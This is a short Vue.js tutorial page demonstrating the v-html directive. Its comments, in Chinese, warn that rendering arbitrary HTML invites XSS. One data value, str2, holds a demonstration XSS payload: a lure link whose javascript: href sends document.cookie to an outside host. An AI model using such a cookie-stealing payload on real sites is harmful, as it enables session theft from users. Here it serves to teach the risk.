<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>v-html</title>
    <script src="../js/vue.js"></script>
  </head>
  <body>
    <!--  
        v-html指令:
            1.作用:向指定节点中渲染包含html结构的内容。
            2.与插值语法的区别:
                (1).v-html会替换掉节点中所有的内容，{{xx}}则不会。
                (2).v-html可以识别html结构。
            3.严重注意:v-html有安全性问题!!!!
                (1).在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击。
                (2).一定要在可信的内容上使用v-htm1,永不要用在用户提交的内容上!

    -->

    <div id="root">
      <div>你好,{{name}}</div>
      <div v-html="str"></div>
      <div v-html="str2"></div>
    </div>
    <script>
      Vue.config.productionTip = false;

      new Vue({
        el: "#root",
        data: {
          name: "尚硅谷",
          str: "<h3>你好啊!</h3>",
          str2: '<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>兄弟我找到你想要的东西了，点我</a>',
        },
      });
    </script>
  </body>
</html>
